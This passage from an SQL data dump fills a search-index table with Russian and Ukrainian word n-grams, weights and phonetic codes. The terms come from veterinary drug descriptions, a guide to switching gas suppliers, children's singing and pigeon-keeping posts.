и',0,1,1.9,'с000',1,'*'),(1643753,'стрептококкоз','стрептококкоз',0,0,0.8667,'с000',1,'*'),(1643754,'стрептококкоз стафилококкоз','стрептококкоз стафилококкоз',0,1,1.9,'с000',1,'*'),(1643755,'стрептококкоз стафилококкоз пастереллез','стрептококкоз стафилококкоз пастереллез',0,1,2,'с000',1,'*'),(1643756,'сутки','сутки',0,0,0.3333,'с000',1,'*'),(1643757,'сутки задается','сутки задается',0,1,1.4667,'с000',1,'*'),(1643758,'сутки задается в','сутки задается в',0,1,1.5333,'с000',1,'*'),(1643759,'сутки препарат','сутки препарат',0,1,1.4667,'с000',1,'*'),(1643760,'сутки препарат задается','сутки препарат задается',0,1,1.7667,'с000',1,'*'),(1643761,'счет','счет',0,0,0.2667,'с000',1,'*'),(1643762,'счет ингибирования','счет ингибирования',0,1,1.6,'с000',1,'*'),(1643763,'счет ингибирования внутриклеточной','счет ингибирования внутриклеточной',0,1,2,'с000',1,'*'),(1643764,'счет стимулирования','счет стимулирования',0,1,1.6333,'с000',1,'*'),(1643765,'счет стимулирования клеточного','счет стимулирования клеточного',0,1,2,'с000',1,'*'),(1643766,'тела без','тела без',0,1,1.2667,'т000',1,'*'),(1643767,'тела без разведения','тела без разведения',0,1,1.6333,'т000',1,'*'),(1643768,'тех','тех',0,0,0.2,'т000',1,'*'),(1643769,'тех же','тех же',0,1,1.2,'т000',1,'*'),(1643770,'тех же дозах','тех же дозах',0,1,1.4,'т000',1,'*'),(1643771,'течение','течение',0,0,0.4667,'т000',1,'*'),(1643772,'течение 4-5','течение 4-5',0,1,1.3667,'т000',1,'*'),(1643773,'течение 4-5 дней','течение 4-5 дней',0,1,1.5333,'т000',1,'*'),(1643774,'течение 4-5дней','течение 4-5дней',0,1,1.5,'т000',1,'*'),(1643775,'течение 4-5дней при','течение 4-5дней при',0,1,1.6333,'т000',1,'*'),(1643776,'течение 5','течение 5',0,1,1.3,'т000',1,'*'),(1643777,'течение 5 дней','течение 5 дней',0,1,1.4667,'т000',1,'*'),(1643778,'у животных','у животных',0,1,1.3333,'у000',1,'*'),(1643779,'у животных и','у животных и',0,1,1.4,'у000',1,'*'),(1643780,'уровня','уровня',0,0,0.4,'у000',1,'*'),(1643781,'уровня лизоцима','уровня лизоцима',0,1,1.5,'у000',1,'*'),(1643782,'уровня лизоцима применение','уровня лизоцима применение',0,1,1.8667,'у000',1,'*'),(1643783,'усиления','усиления',0,0,0.5333,'у000',1,'*'),(1643784,'усиления синтеза','усиления синтеза',0,1,1.5333,'у000',1,'*'),(1643785,'усиления синтеза моконуклеаров','усиления синтеза моконуклеаров',0,1,2,'у000',1,'*'),(1643786,'уши','уши',0,0,0.2,'у000',1,'*'),(1643787,'уши по','уши по',0,1,1.2,'у000',1,'*'),(1643788,'уши по 2-3','уши по 2-3',0,1,1.3333,'у000',1,'*'),(1643789,'фармакологические свойства противовирусное','фармакологические свойства противовирусное',0,1,2,'ф000',1,'*'),(1643790,'фасовка','фасовка',0,0,0.4667,'ф000',1,'*'),(1643791,'фасовка флакон','фасовка флакон',0,1,1.4667,'ф000',1,'*'),(1643792,'фасовка флакон 100','фасовка флакон 100',0,1,1.6,'ф000',1,'*'),(1643793,'флакон','флакон',0,0,0.4,'ф000',1,'*'),(1643794,'флакон 100','флакон 100',0,1,1.3333,'ф000',1,'*'),(1643795,'флакон 100 мл','флакон 100 мл',0,1,1.4333,'ф000',1,'*'),(1643796,'ходы','ходы',0,0,0.2667,'х000',1,'*'),(1643797,'ходы применяется','ходы применяется',0,1,1.5333,'х000',1,'*'),(1643798,'ходы применяется для','ходы применяется для',0,1,1.6667,'х000',1,'*'),(1643799,'целью препарат','целью препарат',0,1,1.4667,'ц000',1,'*'),(1643800,'целью препарат задается','целью препарат задается',0,1,1.7667,'ц000',1,'*'),(1643801,'чума','чума',0,0,0.2667,'ч000',1,'*'),(1643802,'чума плотоядных','чума плотоядных',0,1,1.5,'ч000',1,'*'),(1643803,'чума плотоядных парвовирусный','чума плотоядных парвовирусный',0,1,1.9667,'ч000',1,'*'),(1643804,'экзема','экзема',0,0,0.4,'э000',1,'*'),(1643805,'экзема рожа','экзема рожа',0,1,1.3667,'э000',1,'*'),(1643806,'экзема рожа ожоги','экзема рожа ожоги',0,1,1.5667,'э000',1,'*'),(1643807,'экспозицией','экспозицией',0,0,0.7333,'э000',1,'*'),(1643808,'экспозицией 45','экспозицией 45',0,1,1.4667,'э000',1,'*'),(1643809,'экспозицией 45 мин','экспозицией 45 мин',0,1,1.6,'э000',1,'*'),(1643810,'энтерит','энтерит',0,0,0.4667,'э000',1,'*'),(1643811,'энтерит собак','энтерит собак',0,1,1.4333,'э000',1,'*'),(1643812,'энтерит собак панлейкемия','энтерит собак панлейкемия',0,1,1.8333,'э000',1,'*'),(1644126,'pershi','pershi',0,0,0.4,'P620',2,'*'),(1644127,'pershi poshtovi','pershi poshtovi',0,1,1.5,'P621231',2,'*'),(1644128,'pershi poshtovi 2021','pershi poshtovi 2021',0,1,1.6667,'P621231',2,'*'),(1644129,'poshtovi 2021','poshtovi 2021',0,1,1.4333,'P231',2,'*'),(1644130,'poshtovi 2021 roku','poshtovi 2021 roku',0,1,1.6,'P23162',2,'*'),(1644131,'перші','перші',0,0,0.3333,'п000',2,'*'),(1644132,'перші поштові','перші поштові',0,1,1.4333,'п000',2,'*'),(1644133,'перші поштові 2021','перші поштові 2021',0,1,1.6,'п000',2,'*'),(1644134,'поштові 2021','поштові 2021',0,1,1.4,'п000',2,'*'),(1644135,'поштові 2021 року','поштові 2021 року',0,1,1.5667,'п000',2,'*'),(1644906,'2501','2501',0,0,0.4,'',1,'*'),(1644907,'chasu','chasu',0,0,0.3333,'C000',1,'*'),(1644908,'chasu tse','chasu tse',0,1,1.3,'C320',1,'*'),(1644909,'chasu tse zajmae','chasu tse zajmae',0,1,1.5333,'C325',1,'*'),(1644910,'com ua https','com ua https',0,1,1.4,'C5312',1,'*'),(1644911,'gazova','gazova',0,0,0.4,'G100',1,'*'),(1644912,'gazova gramota','gazova gramota',0,1,1.4667,'G12653',1,'*'),(1644913,'gazova gramota yak','gazova gramota yak',0,1,1.6,'G126532',1,'*'),(1644914,'gazu i','gazu i',0,1,1.2,'G000',1,'*'),(1644915,'gazu i skilki','gazu i skilki',0,1,1.4333,'G420',1,'*'),(1644916,'gramota','gramota',0,0,0.4667,'G653',1,'*'),(1644917,'gramota yak','gramota yak',0,1,1.3667,'G6532',1,'*'),(1644918,'gramota yak zminiti','gramota yak zminiti',0,1,1.6333,'G653253',1,'*'),(1644919,'i skilki','i skilki',0,1,1.2667,'I242',1,'*'),(1644920,'i skilki chasu','i skilki chasu',0,1,1.4667,'I242',1,'*'),(1644921,'postachalnika','postachalnika',0,0,0.8667,'P232452',2,'*'),(1644922,'postachalnika gazu','postachalnika gazu',0,1,1.6,'P232452',2,'*'),(1644923,'postachalnika gazu i','postachalnika gazu i',0,1,1.6667,'P232452',1,'*'),(1644924,'skilki','skilki',0,0,0.4,'S420',1,'*'),(1644925,'skilki chasu','skilki chasu',0,1,1.4,'S420',1,'*'),(1644926,'skilki chasu tse','skilki chasu tse',0,1,1.5333,'S4232',1,'*'),(1644927,'tse','tse',0,0,0.2,'T200',1,'*'),(1644928,'tse zajmae','tse zajmae',0,1,1.3333,'T250',1,'*'),(1644929,'ua https','ua https',0,1,1.2667,'U312',1,'*'),(1644930,'ua https gazpravda','ua https gazpravda',0,1,1.6,'U3121613',1,'*'),(1644931,'yak zminiti','yak zminiti',0,1,1.3667,'Y253',1,'*'),(1644932,'yak zminiti postachalnika','yak zminiti postachalnika',0,1,1.8333,'Y2531232452',1,'*'),(1644933,'zajmae','zajmae',0,0,0.4,'Z500',1,'*'),(1644934,'zminiti','zminiti',0,0,0.4667,'Z530',2,'*'),(1644935,'zminiti postachalnika','zminiti postachalnika',0,1,1.7,'Z531232452',2,'*'),(1644936,'zminiti postachalnika gazu','zminiti postachalnika gazu',0,1,1.8667,'Z531232452',2,'*'),(1644937,'«блакитного','«блакитного',0,0,0.7333,'б000',1,'*'),(1644938,'«блакитного палива»','«блакитного палива»',0,1,1.6333,'б000',1,'*'),(1644939,'«блакитного палива» легко','«блакитного палива» легко',0,1,1.8333,'б000',1,'*'),(1644940,'«газова','«газова',0,0,0.4667,'г000',1,'*'),(1644941,'«газова грамота»','«газова грамота»',0,1,1.5333,'г000',1,'*'),(1644942,'«газова грамота» як','«газова грамота» як',0,1,1.6333,'г000',1,'*'),(1644943,'і без','і без',0,1,1.1667,'і000',1,'*'),(1644944,'і без зайвого','і без зайвого',0,1,1.4333,'і000',1,'*'),(1644945,'і скільки','і скільки',0,1,1.3,'і000',1,'*'),(1644946,'і скільки часу','і скільки часу',0,1,1.4667,'і000',1,'*'),(1644947,'і швидко','і швидко',0,1,1.2667,'і000',1,'*'),(1644948,'і швидко це','і швидко це',0,1,1.3667,'і000',1,'*'),(1644949,'із відкриттям','із відкриттям',0,1,1.4333,'і000',1,'*'),(1644950,'із відкриттям ринку','із відкриттям ринку',0,1,1.6333,'і000',1,'*'),(1644951,'інструкцію','інструкцію',0,0,0.6667,'і000',1,'*'),(1644952,'інструкцію як','інструкцію як',0,1,1.4333,'і000',1,'*'),(1644953,'інструкцію як змінити','інструкцію як змінити',0,1,1.7,'і000',1,'*'),(1644954,'але зазвичай','але зазвичай',0,1,1.4,'а000',1,'*'),(1644955,'але зазвичай перехід','але зазвичай перехід',0,1,1.6667,'а000',1,'*'),(1644956,'без зайвого','без зайвого',0,1,1.3667,'б000',1,'*'),(1644957,'без зайвого клопоту','без зайвого клопоту',0,1,1.6333,'б000',1,'*'),(1644958,'близько','близько',0,0,0.4667,'б000',1,'*'),(1644959,'близько трьох','близько трьох',0,1,1.4333,'б000',1,'*'),(1644960,'близько трьох тижнів','близько трьох тижнів',0,1,1.6667,'б000',1,'*'),(1644961,'бюрократичними','бюрократичними',0,0,0.9333,'б000',1,'*'),(1644962,'бюрократичними процесами','бюрократичними процесами',0,1,1.8,'б000',1,'*'),(1644963,'бюрократичними процесами опікуватиметься','бюрократичними процесами опікуватиметься',0,1,2,'б000',1,'*'),(1644964,'відбувається','відбувається',0,0,0.8,'в000',3,'*'),(1644965,'відбувається набагато','відбувається набагато',0,1,1.7,'в000',1,'*'),(1644966,'відбувається набагато швидше','відбувається набагато швидше',0,1,1.9333,'в000',1,'*'),(1644967,'відкриттям','відкриттям',0,0,0.6667,'в000',1,'*'),(1644968,'відкриттям ринку','відкриттям ринку',0,1,1.5333,'в000',1,'*'),(1644969,'відкриттям ринку газу','відкриттям ринку газу',0,1,1.7,'в000',1,'*'),(1644970,'ви знайдете','ви знайдете',0,1,1.3667,'в000',1,'*'),(1644971,'ви знайдете покрокову','ви знайдете покрокову',0,1,1.7,'в000',1,'*'),(1644972,'газу і','газу і',0,1,1.2,'г000',2,'*'),(1644973,'газу і скільки','газу і скільки',0,1,1.4667,'г000',1,'*'),(1644974,'газу з','газу з',0,1,1.2,'г000',1,'*'),(1644975,'газу з яким','газу з яким',0,1,1.3667,'г000',1,'*'),(1644976,'газу легко','газу легко',0,1,1.3333,'г000',1,'*'),(1644977,'газу легко і','газу легко і',0,1,1.4,'г000',1,'*'),(1644978,'газу може','газу може',0,1,1.3,'г000',1,'*'),(1644979,'газу може займати','газу може займати',0,1,1.5667,'г000',1,'*'),(1644980,'газу українці','газу українці',0,1,1.4333,'г000',1,'*'),(1644981,'газу українці отримали','газу українці отримали',0,1,1.7333,'г000',1,'*'),(1644982,'грамота»','грамота»',0,0,0.5333,'г000',1,'*'),(1644983,'грамота» як','грамота» як',0,1,1.3667,'г000',1,'*'),(1644984,'грамота» як змінити','грамота» як змінити',0,1,1.6333,'г000',1,'*'),(1644985,'до неї заяву','до неї заяву',0,1,1.4,'д000',1,'*'),(1644986,'договір','договір',0,0,0.4667,'д000',1,'*'),(1644987,'договір процес','договір процес',0,1,1.4667,'д000',1,'*'),(1644988,'договір процес зміни','договір процес зміни',0,1,1.6667,'д000',1,'*'),(1644989,'документів','документів',0,0,0.6667,'д000',2,'*'),(1644990,'документів усіма','документів усіма',0,1,1.5333,'д000',1,'*'),(1644991,'документів усіма бюрократичними','документів усіма бюрократичними',0,1,2,'д000',1,'*'),(1644992,'достатньо лише','достатньо лише',0,1,1.4667,'д000',1,'*'),(1644993,'достатньо лише обрати','достатньо лише обрати',0,1,1.7,'д000',1,'*'),(1644994,'з яким','з яким',0,1,1.2,'з000',1,'*'),(1644995,'з яким споживач','з яким споживач',0,1,1.5,'з000',1,'*'),(1644996,'зазвичай перехід','зазвичай перехід',0,1,1.5333,'з000',1,'*'),(1644997,'зазвичай перехід відбувається','зазвичай перехід відбувається',0,1,1.9667,'з000',1,'*'),(1644998,'зайвого','зайвого',0,0,0.4667,'з000',1,'*'),(1644999,'зайвого клопоту','зайвого клопоту',0,1,1.5,'з000',1,'*'),(1645000,'зайвого клопоту https','зайвого клопоту https',0,1,1.7,'з312',1,'*'),(1645001,'займати близько','займати близько',0,1,1.5,'з000',1,'*'),(1645002,'займати близько трьох','займати близько трьох',0,1,1.7,'з000',1,'*'),(1645003,'заяву','заяву',0,0,0.3333,'з000',1,'*'),(1645004,'заяву та','заяву та',0,1,1.2667,'з000',1,'*'),(1645005,'заяву та мінімальний','заяву та мінімальний',0,1,1.6667,'з000',1,'*'),(1645006,'зміни','зміни',0,0,0.3333,'з000',2,'*'),(1645007,'зміни постачальника','зміни постачальника',0,1,1.6333,'з000',2,'*'),(1645008,'зміни постачальника газу','зміни постачальника газу',0,1,1.8,'з000',1,'*'),(1645009,'змінити','змінити',0,0,0.4667,'з000',2,'*'),(1645010,'змінити постачальника','змінити постачальника',0,1,1.7,'з000',2,'*'),(1645011,'змінити постачальника «блакитного','змінити постачальника «блакитного',0,1,2,'з000',1,'*'),(1645012,'змінити постачальника газу','змінити постачальника газу',0,1,1.8667,'з000',2,'*'),(1645013,'знайдете','знайдете',0,0,0.5333,'з000',1,'*'),(1645014,'знайдете покрокову','знайдете покрокову',0,1,1.6,'з000',1,'*'),(1645015,'знайдете покрокову інструкцію','знайдете покрокову інструкцію',0,1,1.9667,'з000',1,'*'),(1645016,'зробити навіть','зробити навіть',0,1,1.4667,'з000',1,'*'),(1645017,'зробити навіть онлайн','зробити навіть онлайн',0,1,1.7,'з000',1,'*'),(1645018,'й подати','й подати',0,1,1.2667,'й000',1,'*'),(1645019,'й подати до','й подати до',0,1,1.3667,'й000',1,'*'),(1645020,'клопоту','клопоту',0,0,0.4667,'к000',1,'*'),(1645021,'клопоту https','клопоту https',0,1,1.4333,'к312',1,'*'),(1645022,'клопоту https gazpravda','клопоту https gazpravda',0,1,1.7667,'к3121613',1,'*'),(1645023,'компанію','компанію',0,0,0.5333,'к000',1,'*'),(1645024,'компанію й','компанію й',0,1,1.3333,'к000',1,'*'),(1645025,'компанію й подати','компанію й подати',0,1,1.5667,'к000',1,'*'),(1645026,'легко','легко',0,0,0.3333,'л000',1,'*'),(1645027,'легко і','легко і',0,1,1.2333,'л000',1,'*'),(1645028,'легко і без','легко і без',0,1,1.3667,'л000',1,'*'),(1645029,'легко і швидко','легко і швидко',0,1,1.4667,'л000',1,'*'),(1645030,'лише','лише',0,0,0.2667,'л000',2,'*'),(1645031,'лише обрати','лише обрати',0,1,1.3667,'л000',1,'*'),(1645032,'лише обрати нову','лише обрати нову',0,1,1.5333,'л000',1,'*'),(1645033,'мінімальний пакет документів','мінімальний пакет документів',0,1,1.9333,'м000',1,'*'),(1645034,'може займати','може займати',0,1,1.4,'м000',1,'*'),(1645035,'може займати близько','може займати близько',0,1,1.6667,'м000',1,'*'),(1645036,'можливість змінити','можливість змінити',0,1,1.6,'м000',1,'*'),(1645037,'можливість змінити постачальника','можливість змінити постачальника',0,1,2,'м000',1,'*'),(1645038,'можна зробити','можна зробити',0,1,1.4333,'м000',1,'*'),(1645039,'можна зробити навіть','можна зробити навіть',0,1,1.6667,'м000',1,'*'),(1645040,'набагато','набагато',0,0,0.5333,'н000',1,'*'),(1645041,'набагато швидше','набагато швидше',0,1,1.5,'н000',1,'*'),(1645042,'набагато швидше у','набагато швидше у',0,1,1.5667,'н000',1,'*'),(1645043,'навіть онлайн','навіть онлайн',0,1,1.4333,'н000',1,'*'),(1645044,'навіть онлайн достатньо','навіть онлайн достатньо',0,1,1.7667,'н000',1,'*'),(1645045,'нашому','нашому',0,0,0.4,'н000',2,'*'),(1645046,'нашому ролику','нашому ролику',0,1,1.4333,'н000',1,'*'),(1645047,'нашому ролику ви','нашому ролику ви',0,1,1.5333,'н000',1,'*'),(1645048,'неї заяву','неї заяву',0,1,1.3,'н000',1,'*'),(1645049,'неї заяву та','неї заяву та',0,1,1.4,'н000',1,'*'),(1645050,'нову','нову',0,0,0.2667,'н000',1,'*'),(1645051,'нову компанію','нову компанію',0,1,1.4333,'н000',1,'*'),(1645052,'нову компанію й','нову компанію й',0,1,1.5,'н000',1,'*'),(1645053,'обрати','обрати',0,0,0.4,'о000',3,'*'),(1645054,'обрати нову','обрати нову',0,1,1.3667,'о000',1,'*'),(1645055,'обрати нову компанію','обрати нову компанію',0,1,1.6667,'о000',1,'*'),(1645056,'онлайн','онлайн',0,0,0.4,'о000',2,'*'),(1645057,'онлайн достатньо','онлайн достатньо',0,1,1.5333,'о000',1,'*'),(1645058,'онлайн достатньо лише','онлайн достатньо лише',0,1,1.7,'о000',1,'*'),(1645059,'опікуватиметься','опікуватиметься',0,0,1,'о000',1,'*'),(1645060,'опікуватиметься постачальник','опікуватиметься постачальник',0,1,1.9333,'о000',1,'*'),(1645061,'опікуватиметься постачальник газу','опікуватиметься постачальник газу',0,1,2,'о000',1,'*'),(1645062,'отримали','отримали',0,0,0.5333,'о000',2,'*'),(1645063,'отримали можливість','отримали можливість',0,1,1.6333,'о000',1,'*'),(1645064,'отримали можливість змінити','отримали можливість змінити',0,1,1.9,'о000',1,'*'),(1645065,'пакет документів','пакет документів',0,1,1.5333,'п000',1,'*'),(1645066,'пакет документів усіма','пакет документів усіма',0,1,1.7333,'п000',1,'*'),(1645067,'палива»','палива»',0,0,0.4667,'п000',1,'*'),(1645068,'палива» легко','палива» легко',0,1,1.4333,'п000',1,'*'),(1645069,'палива» легко і','палива» легко і',0,1,1.5,'п000',1,'*'),(1645070,'перехід','перехід',0,0,0.4667,'п000',1,'*'),(1645071,'перехід відбувається','перехід відбувається',0,1,1.6667,'п000',1,'*'),(1645072,'перехід відбувається набагато','перехід відбувається набагато',0,1,1.9667,'п000',1,'*'),(1645073,'подати','подати',0,0,0.4,'п000',1,'*'),(1645074,'подати до','подати до',0,1,1.3,'п000',1,'*'),(1645075,'подати до неї','подати до неї',0,1,1.4333,'п000',1,'*'),(1645076,'покрокову','покрокову',0,0,0.6,'п000',1,'*'),(1645077,'покрокову інструкцію','покрокову інструкцію',0,1,1.6667,'п000',1,'*'),(1645078,'покрокову інструкцію як','покрокову інструкцію як',0,1,1.7667,'п000',1,'*'),(1645079,'постачальник','постачальник',0,0,0.8,'п000',1,'*'),(1645080,'постачальник газу','постачальник газу',0,1,1.5667,'п000',1,'*'),(1645081,'постачальник газу з','постачальник газу з',0,1,1.6333,'п000',1,'*'),(1645082,'постачальника','постачальника',0,0,0.8667,'п000',2,'*'),(1645083,'постачальника «блакитного','постачальника «блакитного',0,1,1.8333,'п000',1,'*'),(1645084,'постачальника «блакитного палива»','постачальника «блакитного палива»',0,1,2,'п000',1,'*'),(1645085,'постачальника газу','постачальника газу',0,1,1.6,'п000',2,'*'),(1645086,'постачальника газу і','постачальника газу і',0,1,1.6667,'п000',1,'*'),(1645087,'постачальника газу легко','постачальника газу легко',0,1,1.8,'п000',1,'*'),(1645088,'постачальника газу може','постачальника газу може',0,1,1.7667,'п000',1,'*'),(1645089,'процес','процес',0,0,0.4,'п000',2,'*'),(1645090,'процес зміни','процес зміни',0,1,1.4,'п000',1,'*'),(1645091,'процес зміни постачальника','процес зміни постачальника',0,1,1.8667,'п000',1,'*'),(1645092,'процесами','процесами',0,0,0.6,'п000',1,'*'),(1645093,'процесами опікуватиметься','процесами опікуватиметься',0,1,1.8333,'п000',1,'*'),(1645094,'процесами опікуватиметься постачальник','процесами опікуватиметься постачальник',0,1,2,'п000',1,'*'),(1645095,'ринку','ринку',0,0,0.3333,'р000',2,'*'),(1645096,'ринку газу','ринку газу',0,1,1.3333,'р000',1,'*'),(1645097,'ринку газу українці','ринку газу українці',0,1,1.6333,'р000',1,'*'),(1645098,'ролику','ролику',0,0,0.4,'р000',1,'*'),(1645099,'ролику ви','ролику ви',0,1,1.3,'р000',1,'*'),(1645100,'ролику ви знайдете','ролику ви знайдете',0,1,1.6,'р000',1,'*'),(1645101,'скільки','скільки',0,0,0.4667,'с000',1,'*'),(1645102,'скільки часу','скільки часу',0,1,1.4,'с000',1,'*'),(1645103,'скільки часу це','скільки часу це',0,1,1.5,'с000',1,'*'),(1645104,'споживач','споживач',0,0,0.5333,'с000',1,'*'),(1645105,'споживач хоче','споживач хоче',0,1,1.4333,'с000',1,'*'),(1645106,'споживач хоче укласти','споживач хоче укласти',0,1,1.7,'с000',1,'*'),(1645107,'та мінімальний','та мінімальний',0,1,1.4667,'т000',1,'*'),(1645108,'та мінімальний пакет','та мінімальний пакет',0,1,1.6667,'т000',1,'*'),(1645109,'тижнів але','тижнів але',0,1,1.3333,'т000',1,'*'),(1645110,'тижнів але зазвичай','тижнів але зазвичай',0,1,1.6333,'т000',1,'*'),(1645111,'трьох','трьох',0,0,0.3333,'т000',2,'*'),(1645112,'трьох тижнів','трьох тижнів',0,1,1.4,'т000',1,'*'),(1645113,'трьох тижнів але','трьох тижнів але',0,1,1.5333,'т000',1,'*'),(1645114,'у нашому','у нашому',0,1,1.2667,'у000',1,'*'),(1645115,'у нашому ролику','у нашому ролику',0,1,1.5,'у000',1,'*'),(1645116,'укласти','укласти',0,0,0.4667,'у000',1,'*'),(1645117,'укласти договір','укласти договір',0,1,1.5,'у000',1,'*'),(1645118,'укласти договір процес','укласти договір процес',0,1,1.7333,'у000',1,'*'),(1645119,'українці отримали','українці отримали',0,1,1.5667,'у000',1,'*'),(1645120,'українці отримали можливість','українці отримали можливість',0,1,1.9333,'у000',1,'*'),(1645121,'усіма','усіма',0,0,0.3333,'у000',1,'*'),(1645122,'усіма бюрократичними','усіма бюрократичними',0,1,1.6667,'у000',1,'*'),(1645123,'усіма бюрократичними процесами','усіма бюрократичними процесами',0,1,2,'у000',1,'*'),(1645124,'хоче','хоче',0,0,0.2667,'х000',1,'*'),(1645125,'хоче укласти','хоче укласти',0,1,1.4,'х000',1,'*'),(1645126,'хоче укласти договір','хоче укласти договір',0,1,1.6667,'х000',1,'*'),(1645127,'це займає','це займає',0,1,1.3,'ц000',1,'*'),(1645128,'це можна','це можна',0,1,1.2667,'ц000',1,'*'),(1645129,'це можна зробити','це можна зробити',0,1,1.5333,'ц000',1,'*'),(1645130,'часу','часу',0,0,0.2667,'ч000',1,'*'),(1645131,'часу це','часу це',0,1,1.2333,'ч000',1,'*'),(1645132,'часу це займає','часу це займає',0,1,1.4667,'ч000',1,'*'),(1645133,'швидко','швидко',0,0,0.4,'ш000',2,'*'),(1645134,'швидко це','швидко це',0,1,1.3,'ш000',1,'*'),(1645135,'швидко це можна','швидко це можна',0,1,1.5,'ш000',1,'*'),(1645136,'швидше','швидше',0,0,0.4,'ш000',1,'*'),(1645137,'швидше у','швидше у',0,1,1.2667,'ш000',1,'*'),(1645138,'швидше у нашому','швидше у нашому',0,1,1.5,'ш000',1,'*'),(1645139,'як змінити','як змінити',0,1,1.3333,'я000',1,'*'),(1645140,'як змінити постачальника','як змінити постачальника',0,1,1.8,'я000',1,'*'),(1645141,'яким споживач','яким споживач',0,1,1.4333,'я000',1,'*'),(1645142,'яким споживач хоче','яким споживач хоче',0,1,1.6,'я000',1,'*'),(1645161,'2502','2502',0,0,0.4,'',1,'*'),(1645162,'ditej','ditej',0,0,0.3333,'D200',1,'*'),(1645163,'ditej v','ditej v',0,1,1.2333,'D210',1,'*'),(1645164,'ditej v golos','ditej v golos',0,1,1.4333,'D21242',1,'*'),(1645165,'diti','diti',0,0,0.2667,'D000',1,'*'),(1645166,'golos diti','golos diti',0,1,1.3333,'G423',1,'*'),(1645167,'krashchi','krashchi',0,0,0.5333,'K620',1,'*'),(1645168,'krashchi vistupi','krashchi vistupi',0,1,1.5333,'K621231',1,'*'),(1645169,'krashchi vistupi ditej','krashchi vistupi ditej',0,1,1.7333,'K62123132',1,'*'),(1645170,'v golos','v golos',0,1,1.2333,'V242',1,'*'),(1645171,'v golos diti','v golos diti',0,1,1.4,'V2423',1,'*'),(1645172,'vistupi','vistupi',0,0,0.4667,'V231',1,'*'),(1645173,'vistupi ditej','vistupi ditej',0,1,1.4333,'V23132',1,'*'),(1645174,'vistupi ditej v','vistupi ditej v',0,1,1.5,'V231321',1,'*'),(1645175,'в голос','в голос',0,1,1.2333,'в000',1,'*'),(1645176,'в голос діти','в голос діти',0,1,1.4,'в000',1,'*'),(1645177,'виступи','виступи',0,0,0.4667,'в000',1,'*'),(1645178,'виступи дітей','виступи дітей',0,1,1.4333,'в000',1,'*'),(1645179,'виступи дітей в','виступи дітей в',0,1,1.5,'в000',1,'*'),(1645180,'голос діти','голос діти',0,1,1.3333,'г000',1,'*'),(1645181,'дітей в','дітей в',0,1,1.2333,'д000',1,'*'),(1645182,'дітей в голос','дітей в голос',0,1,1.4333,'д000',1,'*'),(1645183,'діти','діти',0,0,0.2667,'д000',1,'*'),(1645184,'кращі','кращі',0,0,0.3333,'к000',1,'*'),(1645185,'кращі виступи','кращі виступи',0,1,1.4333,'к000',1,'*'),(1645186,'кращі виступи дітей','кращі виступи дітей',0,1,1.6333,'к000',1,'*'),(1645255,'2503','2503',0,0,0.4,'',1,'*'),(1645256,'3 bereznya','3 bereznya',0,1,1.3333,'B625',1,'*'),(1645257,'3 bereznya 2021','3 bereznya 2021',0,1,1.5,'B625',1,'*'),(1645258,'3 березня','3 березня',0,1,1.3,'б000',1,'*'),(1645259,'3 березня 2021','3 березня 2021',0,1,1.4667,'б000',1,'*'),(1645260,'bereznya','bereznya',0,0,0.5333,'B625',2,'*'),(1645261,'bereznya 2021','bereznya 2021',0,1,1.4333,'B625',2,'*'),(1645262,'bereznya 2021 roku','bereznya 2021 roku',0,1,1.6,'B62562',2,'*'),(1645263,'goduyu','goduyu',0,0,0.4,'G300',1,'*'),(1645264,'goduyu vruchnu','goduyu vruchnu',0,1,1.4667,'G31625',1,'*'),(1645265,'goduyu vruchnu vzhe','goduyu vruchnu vzhe',0,1,1.6333,'G3162512',1,'*'),(1645266,'molodi poshtovi goduyu','molodi poshtovi goduyu',0,1,1.7333,'M43123123',1,'*'),(1645267,'pidrostayut','pidrostayut',0,0,0.7333,'P3623',1,'*'),(1645268,'pidrostayut molodi','pidrostayut molodi',0,1,1.6,'P3623543',1,'*'),(1645269,'pidrostayut molodi poshtovi','pidrostayut molodi poshtovi',0,1,1.9,'P36235431231',1,'*'),(1645270,'poshtovi goduyu','poshtovi goduyu',0,1,1.5,'P23123',1,'*'),(1645271,'poshtovi goduyu vruchnu','poshtovi goduyu vruchnu',0,1,1.7667,'P231231625',1,'*'),(1645272,'vruchnu','vruchnu',0,0,0.4667,'V625',1,'*'),(1645273,'vruchnu vzhe','vruchnu vzhe',0,1,1.4,'V62512',1,'*'),(1645274,'vruchnu vzhe 3','vruchnu vzhe 3',0,1,1.4667,'V62512',1,'*'),(1645275,'vzhe 3','vzhe 3',0,1,1.2,'V200',1,'*'),(1645276,'vzhe 3 bereznya','vzhe 3 bereznya',0,1,1.5,'V21625',1,'*'),(1645277,'березня','березня',0,0,0.4667,'б000',3,'*'),(1645278,'березня 2021','березня 2021',0,1,1.4,'б000',2,'*'),(1645279,'березня 2021 року','березня 2021 року',0,1,1.5667,'б000',2,'*'),(1645280,'вже 3','вже 3',0,1,1.1667,'в000',1,'*'),(1645281,'вже 3 березня','вже 3 березня',0,1,1.4333,'в000',1,'*'),(1645282,'вручну','вручну',0,0,0.4,'в000',1,'*'),(1645283,'вручну вже','вручну вже',0,1,1.3333,'в000',1,'*'),(1645284,'вручну вже 3','вручну вже 3',0,1,1.4,'в000',1,'*'),(1645285,'годую','годую',0,0,0.3333,'г000',1,'*'),(1645286,'годую вручну','годую вручну',0,1,1.4,'г000',1,'*'),(1645287,'годую вручну вже','годую вручну вже',0,1,1.5333,'г000',1,'*'),(1645288,'молоді поштові годую','молоді поштові годую',0,1,1.6667,'м000',1,'*'),(1645289,'підростають','підростають',0,0,0.7333,'п000',1,'*'),(1645290,'підростають молоді','підростають молоді',0,1,1.6,'п000',1,'*'),(1645291,'підростають молоді поштові','підростають молоді поштові',0,1,1.8667,'п000',1,'*'),(1645292,'поштові годую','поштові годую',0,1,1.4333,'п000',1,'*'),(1645293,'поштові годую вручну','поштові годую вручну',0,1,1.6667,'п000',1,'*'),(1645349,'2504','2504',0,0,0.4,'',1,'*'),(1645350,'budivnitstvo','budivnitstvo',0,0,0.8,'B3153231',1,'*'),(1645351,'budivnitstvo gnizd','budivnitstvo gnizd',0,1,1.6,'B31532312523',1,'*'),(1645352,'gnizd','gnizd',0,0,0.3333,'G523',1,'*'),(1645353,'masove','masove',0,0,0.4,'M210',1,'*'),(1645354,'masove budivnitstvo','masove budivnitstvo',0,1,1.6333,'M213153231',1,'*'),(1645355,'masove budivnitstvo gnizd','masove budivnitstvo gnizd',0,1,1.8333,'M2131532312523',1,'*'),(1645356,'pochinaetsya','pochinaetsya',0,0,0.8,'P2532',1,'*'),(1645357,'pochinaetsya masove','pochinaetsya masove',0,1,1.6333,'P2532521',1,'*'),(1645358,'pochinaetsya masove 